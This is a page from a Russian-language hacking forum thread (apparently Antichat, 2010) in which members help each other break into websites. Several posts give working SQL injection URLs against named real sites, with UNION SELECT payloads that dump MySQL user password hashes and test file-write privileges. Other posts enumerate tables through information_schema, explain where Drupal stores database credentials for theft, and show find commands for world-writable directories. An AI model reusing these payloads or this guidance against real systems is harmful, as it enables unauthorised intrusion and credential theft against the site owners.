Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 663 of 1207
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    по этому нужно работать руками а не программами!

    tables-- select+group_concat(table_name)+from+information_schema.tables--

    columns-- select+group_concat(column_name)+from_information_schema.columns+where+table_name="yourtable"

    hash type: MySQL

    не твой сайт что ли?

    http://www.southworth.com/page.php?id=-5+union+select+group_concat(user,0x3a,password,0x3c42723e)+from+mysql.user
     
    _________________________
    #13241 Konqi, 29 May 2010
    Last edited: 29 May 2010
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Nightmare это тоже не катит?

    print(`find / -type d -perm 2`)
     
    _________________________
    #13242 Konqi, 29 May 2010
  3. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    find / -perm -2 -type d -ls

    искать не пробывал?

    https://forum.antichat.ru/threadnav43966-1-10.html
    https://forum.antichat.ru/thread19844.html
     
    #13243 .:[melkiy]:., 29 May 2010
    Last edited: 29 May 2010
  4. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    А кто подскажет где в движках Drupal хранятся логин и пароль от БД?
     
    #13244 GOGA075, 29 May 2010
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Drupal
    www.site.com/admin/
    users
    uid
    name
    pass
    mail
    login
     
    #13245 Gorev, 29 May 2010
  6. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Gorev Я имел в виду в исходниках (.php)
     
    #13246 GOGA075, 29 May 2010
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    причем тут php? пароли хранятся в бд
     
    _________________________
    #13247 Konqi, 29 May 2010
  8. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Konqi А так же в файлах на подобии config.php...
    Толь в движках Drupal таких файлов нету!!
     
    #13248 GOGA075, 29 May 2010
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    значит в движке друпал пароли хранятся только в бд :p
     
    _________________________
    #13249 Konqi, 29 May 2010
  10. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    мда
    ему нужен файл где хранится хост\логин\пасс для коннекта к бд
     
    #13250 .:[melkiy]:., 29 May 2010
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ну в джумле это configuration.php a в друпал такое есть? не знаю :rolleyes:
     
    _________________________
    #13251 Konqi, 29 May 2010
  12. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    .:[melkiy]:. Ну хоть до кого то дошло!!

    Konqi В друпал таких файлов нету, вот поэтому и спрашиваю!
     
    #13252 GOGA075, 29 May 2010
    1 person likes this.
  13. DrakonSerg

    DrakonSerg Member

    Joined:
    16 Apr 2009
    Messages:
    66
    Likes Received:
    17
    Reputations:
    -1
    2 Konqi как можно угадать сайт без малейших намеков? )) или совпадение, или ты экстрасенс, блин... ))
    Есть вариант от админки пасс вытащить?
     
    #13253 DrakonSerg, 29 May 2010
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    даю гарантию что твой сайт уже несколько раз поимели,в кэше googla хранится, а по поводу админки даже не смотрел
     
    _________________________
    #13254 Konqi, 29 May 2010
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    В Друпал
    ./sites/default/settings.php
     
    #13255 попугай, 29 May 2010
  16. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    файл /sites/default/settings.php а информация в переменной $db_url
     
    #13256 warlok, 29 May 2010
  17. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    вбей 'abcd, если abcd в ошибке будет, то крути.

    Насчёт drupal, смотри /sites/название сайта, а вообще может быть любое/settings.php
    В default редко бывают доступы.
     
    #13257 Ctacok, 30 May 2010
  18. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Скажите как проверить file_priv?
    Вот например инъекция:
    Code:
    http://germanfirms.ru/products.php?id=63+union+select+1+--+
    Делаю так:
    Code:
    http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mysql.user+where+user='db156426_4'+--+
    Не выводит ни 'Y' ни 'N'. Что не так?
    И как я понимаю, если будет 'Y', то можно будет залить файл?
     
    #13258 CyberHunter, 30 May 2010
  19. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    попробуй таблицу users
    там админ
     
    #13259 AC//DC, 30 May 2010
  20. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    если мойно помоqите наыти админку
     
    #13260 LokbatanLi, 30 May 2010
(You must log in or sign up to post here.)
Page 663 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.